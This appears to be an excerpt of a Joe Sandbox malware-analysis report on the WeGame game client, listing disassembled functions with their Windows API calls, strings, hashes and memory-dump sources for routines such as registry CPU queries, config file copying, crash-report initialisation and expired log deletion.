                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@H_prolog3U?$char_traits@V?$allocator@V?$basic_string@$?get_log_instance@base@@D@2@@std@@Logger@1@Wegame$??_0path@filesystem@ierd_tgp@@?get_cfg_by_path@common@ierd_tgp@@?get_exe_path_ex@?is_static_detail_log@common@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@Application@common@ierd_tgp@@Count@util_multi_instance@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_H_prolog3_catch_ProcessProcess@util_multi_instance@ierd_tgp@@U?$less@V012@V012@@V123@V12@V?$basic_ptree@Vpath@filesystem@3@_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID: !$is_crypt$level$log$log$sub_instance_$tcls/log
                                                                • API String ID: 3319094191-1757275872
                                                                • Opcode ID: 7c79e9eaf2037cfc48e3e319a7c6ed09e005b1c01fe953423af65cd3ad07b2ab
                                                                • Instruction ID: 10d7c95779795f8c20453facca36c4efdf3cecc591cb2f344c412f93a0e86e0c
                                                                • Opcode Fuzzy Hash: 7c79e9eaf2037cfc48e3e319a7c6ed09e005b1c01fe953423af65cd3ad07b2ab
                                                                • Instruction Fuzzy Hash: 22B19071C0128CEADB05EBA5CD95BDDBBB4AF14308F14409EE10577282EB781F48DBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDBD879 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 123registrylibraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBD883
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • GetModuleHandleA.KERNEL32 ref: 6BDBD8DE
                                                                • GetProcAddress.KERNEL32(00000000), ref: 6BDBD8E5
                                                                • memset.VCRUNTIME140(?,00000000,00000040), ref: 6BDBD8FB
                                                                • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 6BDBD914
                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 6BDBD95C
                                                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,00000000,?), ref: 6BDBD98B
                                                                • RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,00000004), ref: 6BDBD9B5
                                                                • RegCloseKey.KERNEL32(00000000), ref: 6BDBD9C6
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 6BDBD9E3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 6BDBD9EA
                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 6BDBD9FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcQueryValue$CloseGlobalH_prolog3_InfoMemoryNativeOpenStatusSystemmemmovememset
                                                                • String ID: %d#%d#%d#%d$@$GetNativeSystemInfo$GlobalMemoryStatusEx$HARDWARE\DESCRIPTION\System\CentralProcessor\0$kernel32.dll$~MHz
                                                                • API String ID: 3699991175-3485845034
                                                                • Opcode ID: 88a1b43a5fc4b5ab0d261001de5ba3e3fe4edf2e2a871f588515b1b0b71d39cf
                                                                • Instruction ID: f79d6c39c473f4ddf15ed977869c2618d8ed96e00af6187d6c5d9cb98244f3ca
                                                                • Opcode Fuzzy Hash: 88a1b43a5fc4b5ab0d261001de5ba3e3fe4edf2e2a871f588515b1b0b71d39cf
                                                                • Instruction Fuzzy Hash: 074149B2900259EFEF249FA4CC84BD9B7B8BB04344F1044DAE609B7251DB799E858F30
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD49DEF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 221COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1655 6bd49def-6bd49e23 __EH_prolog3_catch_GS 1656 6bd49e25 1655->1656 1657 6bd49e27-6bd49e58 call 6bd19a8e ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z call 6bd1d276 ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z 1655->1657 1656->1657 1662 6bd49e6c-6bd49e71 ?get_log_instance@base@@YAPAVILogger@1@XZ 1657->1662 1663 6bd49e5a-6bd49e67 call 6bd0a3a0 1657->1663 1665 6bd49e73-6bd49e75 1662->1665 1671 6bd4a0b1-6bd4a0b6 call 6be22e41 1663->1671 1666 6bd49ed5-6bd49ef0 ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z 1665->1666 1667 6bd49e77-6bd49e84 1665->1667 1669 6bd49ef2-6bd49efb ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z 1666->1669 1670 6bd49efc-6bd49f83 ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z ?backup_cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ call 6bd45b20 call 6bd1d276 * 3 ?copy_file@filesystem@ierd_tgp@@YAXABVpath@12@0@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 1666->1670 1667->1666 1675 6bd49e86-6bd49eba call 6bd1a5ef call 6bd1e945 1667->1675 1669->1670 1690 6bd49f85-6bd49f87 1670->1690 1685 6bd49ebf-6bd49ed3 call 6bd1b6ea 1675->1685 1685->1665 1691 6bd49fe7-6bd49ff0 ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z 1690->1691 1692 6bd49f89-6bd49f96 1690->1692 1693 6bd4a017-6bd4a01c ?get_log_instance@base@@YAPAVILogger@1@XZ 1691->1693 1694 6bd49ff2-6bd4a012 call 6bd1d276 * 2 1691->1694 1692->1691 1701 6bd49f98-6bd49fcc call 6bd1a5ef call 6bd1e945 1692->1701 1696 6bd4a01e-6bd4a020 1693->1696 1694->1693 1699 6bd4a080-6bd4a0af call 6bd1d276 * 2 call 6bd0a3a0 1696->1699 1700 6bd4a022-6bd4a02f 1696->1700 1699->1671 1700->1699 1710 6bd4a031-6bd4a07e call 6bd1a5ef call 6bd1e945 call 6bd1b6ea 1700->1710 1714 6bd49fd1-6bd49fe5 call 6bd1b6ea 1701->1714 1710->1696 1714->1690
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD49DF9
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000008,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49E3C
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD49E50
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025), ref: 6BD49E6C
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD49EDB
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49EE8
                                                                • ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49EF6
                                                                • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49F05
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000), ref: 6BD49F12
                                                                • ?backup_cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000000,?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?), ref: 6BD49F22
                                                                • ?copy_file@filesystem@ierd_tgp@@YAXABVpath@12@0@Z.COMMON(?,?), ref: 6BD49F77
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD49F7E
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?), ref: 6BD49FE8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD4A017
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6BD49E90, 6BD49FA2, 6BD4A03B
                                                                • [cfg_mgr][cfg_file_model]copy file failer: %s, xrefs: 6BD4A05E
                                                                • [cfg_file_model]file copied: %s, xrefs: 6BD49FC5
                                                                • [cfg_mgr]file not exist: %s, xrefs: 6BD49EB3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?exists@filesystem@ierd_tgp@@?get_log_instance@base@@Logger@1@Vpath@12@@$H_prolog3_catch_U?$char_traits@_V123@V?$allocator@_V?$basic_string@_W@std@@$??0path@filesystem@ierd_tgp@@?backup_cfg_folder@?copy_file@filesystem@ierd_tgp@@?create_directory_ex@?filename@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@File_info@common@ierd_tgp@@H_prolog3Sys_wrapper@common@ierd_tgp@@U?$char_traits@V?$allocator@V?$basic_string@Vpath@12@0@Vpath@filesystem@3@Vpath@filesystem@3@@W@2@@std@@W@2@@std@@@
                                                                • String ID: [cfg_file_model]file copied: %s$[cfg_mgr][cfg_file_model]copy file failer: %s$[cfg_mgr]file not exist: %s$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp
                                                                • API String ID: 2517312394-3082331219
                                                                • Opcode ID: c8121eec776ffd85256707a1d7413fe8432437e7c171c400d690010ae3f199b8
                                                                • Instruction ID: 35920c3ea3b368d11b5bd4e1f5d8d18fb536d1f56056ac8bf7fd9f8a7442f3a9
                                                                • Opcode Fuzzy Hash: c8121eec776ffd85256707a1d7413fe8432437e7c171c400d690010ae3f199b8
                                                                • Instruction Fuzzy Hash: D1818E71805248EADF15DBF8C955BDDBBB49F21328F208098D0516F182EB799B09DBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045F813 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0045F81A
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit begin,0000007C,00459F30,00000000,?), ref: 0045F824
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,log,00000003,?,?,?,?,?,?,?,?,?,0000007C,00459F30), ref: 0045F86A
                                                                  • Part of subcall function 00459C66: __EH_prolog3.LIBCMT ref: 00459C6D
                                                                  • Part of subcall function 00469DFB: __EH_prolog3_GS.LIBCMT ref: 00469E02
                                                                  • Part of subcall function 00453D50: __EH_prolog3.LIBCMT ref: 00453D57
                                                                  • Part of subcall function 00453D50: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008), ref: 00453D6E
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?), ref: 0045F8EF
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 0045F8FB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F920
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F92C
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F93D
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F94F
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045F975
                                                                • ?Init@CrashReportLoader@crash_report@@QAEXPB_W_K1HP6GHPAUtagCrashReportHelperCallbackInfo@@@Z0@Z.ADAPT_FOR_IMPORTS(?,00000000,00000000,0000000A,00000004,00000000,0045EA47,?), ref: 0045F9A1
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit end), ref: 0045F9AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CrashD@std@@H_prolog3ReportU?$char_traits@V?$allocator@V?$basic_string@$?get_client_version_type@overseas@ierd_tgp@@?stamp_point@@D@2@@std@@Loader@crash_report@@SimpleString::operator=V12@$?get_cfg_by_path@common@ierd_tgp@@?is_static_detail_log@common@ierd_tgp@@CallbackD@2@@std@@@2@@property_tree@boost@@_H_prolog3_H_prolog3_catch_HelperId@common@ierd_tgp@@Info@@@Init@Init@locale@std@@Instance@LastLocimp@12@_LoginedU?$less@UtagV?$basic_ptree@Wegame_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID: CrashReportLoaderInit begin$CrashReportLoaderInit end$WeGame$WeGameX$level$log
                                                                • API String ID: 1061463012-1460748738
                                                                • Opcode ID: e7e4b55133e956e2d0b5acf0c269060ca2706953a3307e3c9ad17ebc2d0de39b
                                                                • Instruction ID: 743d4af21edeab1cd04db4995a91b2333f4ad39651bba051e6d5b3d752e51c79
                                                                • Opcode Fuzzy Hash: e7e4b55133e956e2d0b5acf0c269060ca2706953a3307e3c9ad17ebc2d0de39b
                                                                • Instruction Fuzzy Hash: 67416470D01248EBCF14EBEAC956BDDBBB4AF14318F60416EE10577192DB781B09CB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDD35AE Relevance: 30.1, APIs: 12, Strings: 5, Instructions: 384fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BDD35B8
                                                                • _Xtime_get_ticks.MSVCP140(0000022C), ref: 6BDD35DA
                                                                  • Part of subcall function 6BDD2789: __EH_prolog3_GS.LIBCMT ref: 6BDD2790
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,0000022C), ref: 6BDD361F
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BDD372F
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BDD387D
                                                                • DeleteFileW.KERNEL32(?,?,?,61C46800,00000008,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6BDD3913
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDD391D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDD3995
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000022C), ref: 6BDD3B07
                                                                • GetLastError.KERNEL32(00000000,00000003,e:\dailybuild_dev\wegame_client\codes\common\src\utility.cpp,00000030,6C02E7BF), ref: 6BDD395F
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                • DeleteFileW.KERNEL32(6C09A4FC,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BDD3B6A
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\utility.cpp, xrefs: 6BDD3640, 6BDD3946, 6BDD39B6, 6BDD3B28
                                                                • DeleteExpiredFiles delete log file[{}] success, xrefs: 6BDD39D1
                                                                • DeleteExpiredFiles check folder:{}, xrefs: 6BDD3658
                                                                • DeleteExpiredFiles delete log file[{}] failed:[{}], xrefs: 6BDD3976
                                                                • DeleteExpiredFiles DeleteFileW log file[{}], xrefs: 6BDD3B43
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$DeleteFile$??0path@filesystem@ierd_tgp@@ErrorH_prolog3H_prolog3_H_prolog3_catch_LastU?$char_traits@_Unothrow_t@std@@@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                • String ID: DeleteExpiredFiles DeleteFileW log file[{}]$DeleteExpiredFiles check folder:{}$DeleteExpiredFiles delete log file[{}] failed:[{}]$DeleteExpiredFiles delete log file[{}] success$e:\dailybuild_dev\wegame_client\codes\common\src\utility.cpp
                                                                • API String ID: 2732379511-4106189631
                                                                • Opcode ID: c7f3da7e4a0dbec188bc642e3ad76289aa77c64bc77547014b35b32e6554ddce
                                                                • Instruction ID: ca41cb1c9d25328a785f45896eab71ee1bd3c3010629f1ced487910264da453b
                                                                • Opcode Fuzzy Hash: c7f3da7e4a0dbec188bc642e3ad76289aa77c64bc77547014b35b32e6554ddce
                                                                • Instruction Fuzzy Hash: F2028B71D40258DACB25CF64C891BDDB7B4AF15324F2081D9D899BB280DB789F89CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD86756 Relevance: 30.1, APIs: 10, Strings: 7, Instructions: 321fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD86760
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000240,6BD8654E,00000000,?,?,?,?,?,00000010,?,000000FF,?), ref: 6BD867AA
                                                                • SetEndOfFile.KERNEL32(?), ref: 6BD867B6
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 6BD867CB
                                                                • CreateFileA.KERNEL32(00000010,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 6BD867F7
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BD86826
                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BD86835
                                                                • __snprintf_s.LIBCMT ref: 6BD86868
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 6BD86BC4
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BD86BD8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateH_prolog3_PointerSizeWrite__snprintf_s_invalid_parameter_noinfo_noreturnmemset
                                                                • String ID: %02x$[Profile]$config1$config2$config3$config4$config5
                                                                • API String ID: 2584474234-2983988086
                                                                • Opcode ID: fe80ec67337f3c3521edb2800ce9414cc2a511095cc764a7e06cdd6d9bb610c0
                                                                • Instruction ID: 9ef133d47e016880d52deb620d589b981922b1f131da6e2a4c593fb8121f3132
                                                                • Opcode Fuzzy Hash: fe80ec67337f3c3521edb2800ce9414cc2a511095cc764a7e06cdd6d9bb610c0
                                                                • Instruction Fuzzy Hash: 6AD1AE71C05258EADB15DBB4CC89BDEBBB8AF15318F1040D9E009BB191DB785B88DBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD926A1 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD926AB
                                                                • memset.VCRUNTIME140(?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD926C1
                                                                • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?), ref: 6BD926D1
                                                                • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745,00000001,00000001,6BD577C5), ref: 6BD926DF
                                                                • memset.VCRUNTIME140(?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000868,6BD964A5,00000118,6BD95745), ref: 6BD926ED
                                                                • memset.VCRUNTIME140(?,00000000,00000400,?,?), ref: 6BD92820
                                                                  • Part of subcall function 6BD104F0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000020,?,6BD108F4,00000000,?,?,6BD108F4,?,00000020,%#.16g,?,00000010), ref: 6BD1050C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD92889
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD928E4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
